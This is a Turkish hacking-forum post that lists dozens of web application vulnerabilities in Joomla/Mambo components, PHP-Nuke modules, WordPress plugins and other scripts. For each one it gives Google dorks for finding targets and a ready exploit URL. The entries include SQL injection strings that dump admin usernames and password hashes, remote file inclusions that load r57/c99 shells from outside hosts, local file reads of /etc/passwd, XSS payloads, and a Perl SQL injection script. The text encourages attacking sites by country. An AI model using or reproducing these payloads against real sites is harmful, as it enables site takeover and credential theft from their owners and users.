Hack l Crack l Serial l Warez l Hacking and Security Forum

PHP-Nuke (Kose_Yazilari) Açığı

Google Arama : ''name Kose_Yazilari op viewarticle artid''
Google arama : ''name Kose_Yazilari op printpage artid''

Site sonuna : modules.php?name=""KoseUS95Yazilari&op=viewarticle &artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu keUS95authors

modules.php?name="KoseUS95Yazilari&op=printpage&ar tid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2FnukeUS 95authors



WorldTube Açığı

Google Arama: "inurl:/plugins/wordtube"

Site Sonuna : wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shell/r57.txt?

Not: Html'den sonrasına kendi shell adresiniz gerekli.



Joomla" Component EventList Açığı

Google Arama : intext: Event List 0.8 Alpha by schlu.net

Site Sonuna : //index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,58),username,char(32,1 12,97,115,115,119,111,114,100,58),password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*



Powered By 6rbScript Açığı

Google Arama : Powered by 6rbScript

Site Sonuna

PWD

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]**/sm3na_authors--

USER

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]**/sm3na_authors--



Com-Actualite Açığı

Google Arama : allinurl: "com_actualite"

Site sonuna : index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),pa ssword),3,4,5,6,7,8,9%20from%20jos_users/*



Com-Mtree Açığı

Google Arama : inurl:"/com_mtree/"

Site sonuna : [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız][mambo_path]/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=



Webring Component (component_dir) Açığı

Google Arama: inurl:com_webring

Site Sonuna : [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız][path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?



Com-Lmo Açığı

Google Arama : "com_lmo"

Site Sonuna : $lmo_dateipfad=$mosConfig_absolute_path."/administrator/components/com_lmo/";
$lmo_url=$mosConfig_live_site."/administrator/components/com_lmo/";



Com-PonyGallery Açığı

Google Arama : inurl:"index.php?option=com_ponygallery"

Site Sonuna : //index.php?option=com_ponygallery&Itemid=x&func=vie wcategory&catid=%20union%20select%201,2,3,concat(c har(117,115,101,114,110,97,109,101,58),username,ch ar(32,112,97,115,115,119,111,114,100,58),password) ,5,0,0%20from%20jos_users/*



Com-NeoRecruit Açığı

Google Arama : inurl:index.php?option=com_NeoRecruit

Site Sonuna : //index.php?option=com_neorecruit&task=offer_view&id =99999999999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),3,4,5,6 ,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4 ,5,0%20from%20jos_users/*



Com-Rsfiles Açığı

Google Arama : inurl:"/index.php?option=com_rsfiles"

Site sonuna : //index.php?option=com_rsfiles&task=files.display&pa th=..|index.php
//index.php?option=com_rsfiles&task=files.display&pa th=



Com-Nicetalk Açığı

Google Arama : inurl:index.php?option=com_nicetalk

Site sonuna : //index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,58),username, char(32,112,97,115,115,119,111,114,100,58),passwor d),777,666,555,444,333,222,111%20from%20jos_users/*



Com-Joomlaradiov5

Google Arama : inurl:"com_joomlaradiov5"

Site Sonuna : [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]



Com-JoomlaFlashFun Açığı

Google Arama : "com_joomlaflashfun"

Site Sonuna : [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız][attacker]



Carousel Flash Image Açığı

Google Arama : inurl:"com_jjgallery

Site Sonuna : [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız][Path]/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://sibersavascilar.com/shelz/r57.txt ?



Com-Mambads Açığı

Google Arama : inurl:com_mambads

Site Sonuna :
index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,1 01,58),username,char(32,112,97,115,115,119,111,114 ,100,58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*

WebLosning Açığı

Dork : allinurl: "index2.php?id"

Exploide

1 [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]*

2 [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]*

3 [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]*

4 [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]*




Powered By: MFH v1 Açığı

Dork: "Powered by: MFH v1"

Exploitation options:

ADIM 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pas s,5,6,7,8+from+users+-- to get the users

ADIM 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+set ting+-- to get the admin info

ADIM 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+serv er+-- to get the ftp server info (if its configured)




W.G.C.C Açığı

Google Dork : "Web Group Communication Center"

Exploit:
XSS:
[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız][path]/profile.php?action=show&userid=%22%3E%3C%69%66%72% 61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61 %2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%7 4%6C%65%74%2E%68%74%6D%6C%3C




Powered By Zomplog Açığı

Dork: "powered by zomplog"

Exploit:
http://localhost/path/upload/force_download.php?file=force_download.php




Xcart Rfi Açığı

Google dork : "X-CART. Powerful PHP shopping cart software"

Exploit

site.com/[xcart-path]/config.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/prepare.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/smarty.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/customer/product.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/provider/auth.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/admin/auth.php?xcart_dir=http://shell.txt?




Plugin-Class tabanlı Sistemlerde Açık

Google Dork: index.php?loc= veya allinurl:.br/index.php?loc=

Exploide:

administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"

Note: 2. dorkda .br/ yazan yerin yerine saldırmak istediğiniz ülkenin uzantısını yazabilirsiniz...




Powered By Linkspile Açığı

Dork : Powered By linkspile

Exploit :

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0 x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,1 8/**/from/**/lp_user_tb/*



The Realestate ****** Açığı

Dork : inurl:dpage.php?docID

Exploit : [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]




Calogic Calendars V1.2.2 Açığı

Dork : "CaLogic Calendars V1.2.2"

POC : http://localhost/[******_PATH]/userreg.php?langsel={SQL}

Example : http://localhost/[******_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--




Powered By PHPizabi Açığı

Dork: "Powered by PHPizabi v0.848b C1 HFP1"

Exploit:

http://localhost/izabi/system/cache/pictures/id_shell.php

Example:

http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500




AJ Auction 6.2.1 Açığı

DORK: inurl:"classifide_ad.php"

Exploide:

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]**/UNION/**/ALL/**/SELECT/**/1,2,3,4,CONCAT(user_name,char(58),password),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*




Powered By Novus Açığı

Dork: "Powered by Novus"

İnformation server:

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]))
[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız])
[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]
[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]




Com-Mgm Açığı

Google Dork: inurl:"com_mgm"

Exploide:

administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?




Com-Loudmounth Açığı

Dork: inurl:com_loudmounth

Exploid:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?




Com-Thopper Açığı

Google Dork : inurl:com_thopper veya inurlhp?option=com_thopper

Exploid:
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=htt p://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?




Com-Bsq-Sitestats Açığı

Google Dork: inurl:com_bsq_sitestats

Exploid:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://megaturks.by.ru/c99.txt?




Com-PeopleBook Açığı

Google Dork: inurl:com_peoplebook

Exploid:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?




Joomla Component AstatsPRO Açığı

Dork: allinurl: "com_astatspro"

Exploide: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*




WorkingOnWeb 2.0.1400 Açığı

Dork: Powered by WorkingOnWeb 2.0.1400

Exploide:

http://localhost/events.php?idevent=-1/**/union/**/select/**/concat(user,0x203a3a20,password),null,0,0,0,0,0,0, 0/**/from/**/mysql.user/*




Powered by cpDynaLinks Açığı

Dork: Powered by cpDynaLinks

connecting in [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]...
[!] user: admin [!] pass: c9cb9115e90580e14a0407ed1fcf8039

use strict;
use LWP::UserAgent;

my $host = $ARGV[0];

if(!$ARGV[0]) {
print "\n
cpDynaLinks 1.02 Remote Sql Inyection exploit\n";
print "
written by ka0x - ka0x01[at]gmail.com\n";
print "
usage: perl $0 [host]\n";
print "
example: [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]";
exit(1);
}

print "\n
connecting in $host...\n";
my $cnx = LWP::UserAgent->new() or die;
my $go=$cnx->get($host."/category.php?category=-1'/**/union/**/select/**/1,2,3,concat(0x5f5f5f5f,0x5b215d20757365723a20,adm in_username,0x20205b215d20706173733a20,admin_passw ord,0x5f5f5f5f),5,6,7,8,9,9,9,9/**/from/**/mnl_admin/*");
if ($go->content =~ m/____(.*?)____/ms) {
print "$1\n";
} else {
print "\n[-] exploit failed\n";
}
Gelen sayfada "kaynağı görüntüle"yiniz. İlk satırlarda admin nick vs md5 ler yer alır




Maplab-2.2 Açığı

Dorks:

index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/

Exploit:
[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız][EvilScript]




Maplab-2.2 Açığı

Dorks:

index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/

Exploit:
[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız][EvilScript]




Admidio 1.4.8 RFI Açığı

Dork : "Admidio Team"
POC : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder=
Example : [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]




ezContents CMS Açığı

Dork: "ezContents CMS Version 2.0.0"

Exploits:

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız][patch]/showdetails.php?contentname="'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*

Exploits 2:

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız][patch]/printer.php?article='/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*




SoftbizScripts Açığı

Dork: "inurl:Powered by SoftbizScripts" veya "Subscribe Newsletter"

Exploit: [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız] union select 1,2,concat(sb_id,0x3a,sb_admin_name,0x3a,sb_pwd),4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9 from sb_host_admin--

****** Açığıdır...




ProfileCMS v1.0 Açığı

Dork: "Powered By ProfileCMS v1.0" veya "Total Generators & Widgets"

Exploit: [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]*

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]*

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]*

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]*




Com-Rsgallery Açığı

Dork: : "option=com_rsgallery" veya inurl:index.php?option=com_rsgallery

Exploit: /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a, password),6,7,8,9,10,11%20from%20mos_users--

Admin nick vs hashları verir. Joomlada bulunan bir açıktır

Admin girişi: /administrator/




Powered By Power Editor Açığı

Dork: Powered By Power Editor

Exploid : [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız][base64 password]&te=[local_file]&dir=[local_dir] examp: editor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../../../../../../../..




Kmitam Açığı

Dork: "inurl:/kmitam/"

Poc/Exploit: kmitaadmin/kmitam/htmlcode.php?file=http://attacker.com/evil?

Yöntemi: Shell




BackLinkSpider Açığı

Dork: "Powered By BackLinkSpider" veya "inurl:backlinkspider.php"

Exploit: [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız][backlinkspider_page_name].php?cat_id=[SQL]

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız][backlinkspider_page_name].php?cat_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,0,1,version (),3,4,5,6,7,8,9,0/*

Kmita Tell Friend Açığı

Dork: "Powered by Kmita Tell Friend" veya "allinurl:/kmitat/"

Exploit: /kmitaadmin/kmitat/htmlcode.php?file=http://attacker.com/evil?

Yöntemi: Shell
Panele yönlendirir.




View-FAQ Açığı

Dork: Google : "allinurl:viewfaqs.php?cat="

Exploide:
/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers--




Days-Booking Açığı

Dork: "allinurl:index.php?user=daysbooking"

Exploid: index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,pa ssword,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2%20from%20admin--&user=det




Pn-Encyclopedia Açığı

Dork: allinurl:index.php?module=pnEncyclopedia

Exploide (1-2)
1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11--
2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,load_file




Gamma Scripts Açığı

Dork : "BlogMe PHP created by Gamma Scripts"

Exploit : http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0 x71)--

veya

http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7--




ASPapp KnowledgeBase Açığı

Dork 1 - content_by_cat.asp?contentid ''catid''

Dork 2 - content_by_cat.asp? ''catid''

exploit-

content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accessleve l,5,null,7,null,user_name+from+users

content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accessleve l,5,null,7,8,user_name+from+users




EmagiC CMS.Net v4.0 Açığı

Dork : inurl:emc.asp?pageid=

Exploit:

emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username="'sa'--




vlBook 1.21 ****** Açığı

****** Download : [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]

DORK : "Powered by vlBook 1.21"

XSS Address : [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]" <******>alert('xss')</******>

LFI Address : [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız][FILE NAME]%00




PHP-Nuke Siir Açığı

DORK 1 : allinurl:"modules.php?name"print

DORK 2 : allinurl:"modules.php?name="Hikaye"
DORK 3: allinurl:"modules.php?name="Fikralar"
DORK 4: allinurl:"modules.php?name="bilgi"

EXPLOIT :

print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,0x3a,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202




Com_JoomlaFlashfun Açığı

Dork: "com_joomlaflashfun"

Example:
[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız][xxxx]




Powered By The Black Lily 2007 Açığı

Dork : "Powered By The Black Lily 2007"

EXPLOIT:
[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]*

veya

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]*




JUser Joomla Component 1.0.14 Açığı

Dork: inurl:com_juser

Exploit

http://localhost/path/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=[evilcode]




Rmsoft GS 2.0 Açığı

Dork: intext:Powered by RMSOFT GS 2.0 veya inurl:modules/rmgs/images.php

Exploit:

modules/rmgs/images.php?q=user&id=1999/**/union/**/all/**/select/**/1,1,concat(database(),0x202D20,user()),1,1,1,1,0,1 ,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/*




Com-Na-Xxx Açığı

DORK 1 : allinurl:"com_na_content"

DORK 2 : allinurl:"com_na_bible"

DORK 3 : allinurl:"com_na_events"

DORK 4 : allinurl:"com_na_content"

DORK 5 : allinurl:"com_na_feedback"

DORK 6 : allinurl:"com_na_mydocs"

DORK 7 : allinurl:"com_na_churchmap"

DORK 8 : allinurl:"com_na_bibleinfo"

DORK 9 : allinurl:"com_na_dbs"

DORK 10 : allinurl:"com_na_udm"

DORK 11 : allinurl:"com_na_qforms"

DORK 12 : allinurl:"com_na_gallery2"

DORK 13 : allinurl:"com_na_publicrss"

DORK 14 : allinurl:"index.php?kwd"

EXPLOİT:

index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,passwo rd%2C0%2C0%2C0/**/from/**/mos_users/*




Com-Comments Açığı

Dork: "Review ******", "Phil Taylor"

Exploit:
index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSW ORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+fro m+mos_content_comments+where+1=1




Portfolio Manager 1.0 Açığı

Dork: inurl:"index.php?option=com_portfolio"

Exploit:

[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]*




Com-Astatspro Açığı

Dork: allinurl: "com_astatspro"

PoC: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*

Gelen sayfada sağ tıkla kaynağı görüntüle.

<H1>302 Moved</H1>
The ******** has moved <A HREF="admin:c9cb9115e90580e14a0407ed1fcf8039:Super Administrator">here</A>.

Bu bölümde md5 saklıdır.




Modified By Fully Açığı

DORK : allinurl :kb.php?mode=article&k
DORK : "Powered by phpBB © 2001, 2006 phpBB Group" veya "Modified by Fully Modded phpBB © 2002, 2006"

EXPLOIT :

kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),usernam e,char(58),user_password),4,5,6,7,8,9,10,11,12,13+ from+phpbb_users+where+user_id+=2&page_num=2&cat=1




Easy-Clanpage v2.2 Açığı

Dork: "Easy-Clanpage v2.2"

Example -1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*




BM Classifieds Açığı

Dork 1 : ''showad.php?listingid=''

Dork 2 : ''pfriendly.php?ad=''

EXPLOIT:

showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*

pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0 ,1,concat(username,0x3a,email),password,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F




Porar WebBoart Açığı

DorK : '' webboard question.asp QID''

EXPLOIT:
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2 ,username,password,5,password,7,8,9,null%20+%20fro m%20+%20+%20administrator%20';';




Com-Noticias Açığı

DorK : ''com_noticias''

EXPLOIT: index.php?option=com_noticias&Itemid=xcorpitx&task =detalhe&id=-99887766/**/union/**/%20select/**/0,concat##(username,0x3a,password,0x3a,email),2,3, 4,5/**/%20from/**/%20jos_users/*




ASPapp -links.asp Açığı

dork - ''links.asp?CatId''

links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,nul l,user_name,%205%20,password,null%20FROM%20Users

admin login-
[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]




Modules-Viso Açığı

DORKS 1 : allinurl :"modules/viso"

EXPLOIT 1 :

modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201

EXPLOIT 2 :

modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass,pass/**/from/**/exv2_users/*where%20exv2_admin%201




Bookmarkx ****** Açığı

DorK 1 : "2007 BookmarkX ******"

DORK 2 : Powered by GengoliaWebStudio

DORK 3 : allinurl :"index.php?menu=showtopic"

EXPLOIT :

index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1

veya;

index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1




Com-Profiler Açığı

DORK: allinurl:com_comprofiler

Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*




Com-Jpad Açığı

DORK: allinurl:com_jpad

Example: /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1 UNION ALL SELECT 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from jos_users--




PostSchedule Açığı

Google Dork : "PostSchedule ver 1"

Exploid:

index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname ,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*




joomla SQL Injection(Com-Jokes) Açığı

DorK : allinurl: "com_jokes"

EXPLOIT :

index.php?option=com_jokes&Itemid=bgh7&func=CatVie w&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*




Com_Estateagent Açığı

Dork : allinurl: "com_estateagent"

EXPLOIT :

index.php?option=com_estateagent&Itemid=bgh7&func= showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=xxxx




Com-Fq Açığı

DorK: allinurl: "com_fq"

EXPLOIT :

index.php?option=com_fq&Itemid=S@BUN&listid=999999 9/**/union/**/select/**/name,password/**/from/**/mos_users/*




Com-Mamml Açığı

DorK : allinurl: "com_mamml"

EXPLOIT :

index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*




joomla SQL Injection(com_gallery) Açığı

DORK : allinurl: com_gallery "func"

EXPLOIT 1 :

index.php?option=com_gallery&Itemid=0&func=detail& id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,use rname/**/from/**/mos_users/*

EXPLOİT 2 :

index.php?option=com_gallery&Itemid=0&func=detail& id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C 0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmo s_users




Joomla Component Profiler Açığı

DORK: allinurl:com_comprofiler

Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*




Joomla Component Filiale SQL Injection Açığı

DORK : inurl:com_filiale

Exploit : /index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10, 11+from+jos_users




FlippingBook Açığı

DORK : inurl:com_flippingbook

Exploit :

/index.php?option=com_flippingbook&Itemid=28&book_i d=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*




Pagenum Açığı

DORK : allinurl: " list.php?pagenum"

EXPLOIT

list.php?pagenum=0&categoryid=1+union+select+111,2 22,concat_ws(char(58),login,password),444+from+adm in_login/*




Modules-Tutorials Açığı

DORK 1 : allinurl :"/modules/tutorials/"

DORK 2 : allinurl :"/modules/tutorials/"tid

EXPLOIT 1 :

modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass), 3,4,5/**/from/**/xoops_users/*

EXPLOIT 2 :

modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/*




Modules-Glossaires Açığı

DORK : allinurl: "modules/glossaires"

EXPLOIT :

